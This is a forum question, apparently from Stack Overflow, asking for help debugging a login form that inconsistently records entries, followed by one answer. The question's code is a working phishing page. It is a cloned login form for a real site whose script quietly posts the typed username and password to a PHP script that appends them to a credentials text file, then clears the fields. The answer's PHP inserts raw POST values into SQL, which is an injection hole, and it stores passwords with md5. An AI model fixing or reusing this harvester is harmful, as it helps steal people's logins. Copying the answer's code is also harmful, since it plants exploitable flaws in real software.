# Inconsistencies with Input form?

Tags: php, jquery, html, ajax

I am just getting into web design with PHP, Ajax, and all the other goodies. I am trying to make a basic system that prints a username and password (or any fields) to a stored database. (I know this isn't secure, it's just a beginners project.) It seems to be highly inconsistent. Field A and Field B do not always print to the database. Sometimes it will print multiple times, and sometimes not at all. Here is the code you might need:

```
<form class="_rwf8p" data-reactid=".0.0.0.0.1.2">
  <div class="_ccek6 _i31zu" data-reactid=".0.0.0.0.1.2.0">
    <input class="_kp5f7 _qy55y" aria-required="true" autocapitalize="off" id="Username" name="Username" type="username" placeholder="Username" value="" autocorrect="off" spellcheck="false" class="" data-reactid=".0.0.0.0.1.2.0.0" type="text" />
  </div>
  <div class="_ccek6 _i31zu" data-reactid=".0.0.0.0.1.2.1">
    <input class="_kp5f7 _qy55y" aria-required="true" autocapitalize="off" id="Passwd" name="Passwd" type="password" placeholder="Password" value="" autocorrect="off" spellcheck="false" class="" data-reactid=".0.0.0.0.1.2.1.0" type="password" />
    <div class="_j4ox0" data-reactid=".0.0.0.0.1.2.1.1">
      <a class="_19gtn" href="/accounts/password/reset/" data-reactid=".0.0.0.0.1.2.1.1.0">
        Forgot?
      </a>
    </div>
  </div>
  <button class="_rz1lq _k2yal _84y62 _7xso1 _nv5lf" data-reactid=".0.0.0.0.1.2.2">
    Log in
  </button>
</form>
<script>
        $("html").keypress(function(event) {
          if(event.keyCode == 13) {
            saveCridentials();
          }
        });

        $("#signIn").click(function() {
          saveCridentials();
        });

        function saveCridentials() {
          $.ajax({
            type: "POST",
            url: "log.php",
            data: { "username" : $("#Username").val(), "password" : $("#Passwd").val() },
            dataType: "json"
          });

          $("#Username").val("");
          $("#Passwd").val("");
        }
</script>
```

The PHP:

```
<?php
    $username = $_POST['username'];
    $password = $_POST['password'];

    fwrite(fopen('cridentials.txt', 'a'), "Username: ". $username . " Password: ". $password . "\n");
?>
```

Any help would be really great, thanks!

Comment: You do not cancel the form submission, that can be an issue.

Answer (score -1):

```
 "I am trying to make a basic system that prints a username and password (or any fields) to a stored database"

 Why not try just php and MySql

 First you will have to connect to your database:

 <?php
 /* Database config */

 $db_host       = 'localhost';
 $db_user       = 'yourinput';
 $db_pass       = 'yourinput';
 $db_database   = 'yourinput'; 

      $link = mysql_connect($db_host,$db_user,$db_pass) or die('Unable to   establish a DB connection');

  mysql_select_db($db_database,$link);
  mysql_query("SET names UTF8");

  // Now lets say a user is trying to register with username and   password, basically the same concept as what you would be trying to do.

  if($_POST['submit']=='Register')

  mysql_query(" INSERT INTO registered(usr,pass)
                    VALUES('".$_POST['usr']."','".md5($pass)."')");

  // This would plug the values of the username and password, which is a randomly generated password but you could figure out how to conform it to the way you want.
  // Most important your database has to be set up correctly. Check out this link http://dev.mysql.com/doc/refman/5.7/en/database-use.html , phpMyAdmin work great when working with data bases as well.
  // Now, you HTML code has to written correctly. Your input form must be configured correctly to correspond to your php code & database. In your case you are simply trying to get the username and password into the database. Your id in your form has to be the same as you database and php code.

  <input class="field" id="username" name="username" size="23" type="text" value=""> 
  <input class="field" id="password" name="password" size="23" type="text" value="">

  //If that doesn't help take a look at: https://www.eduonix.com/blog/web-programming-tutorials/learn-submit-html-data-mysql-database-using-php/
```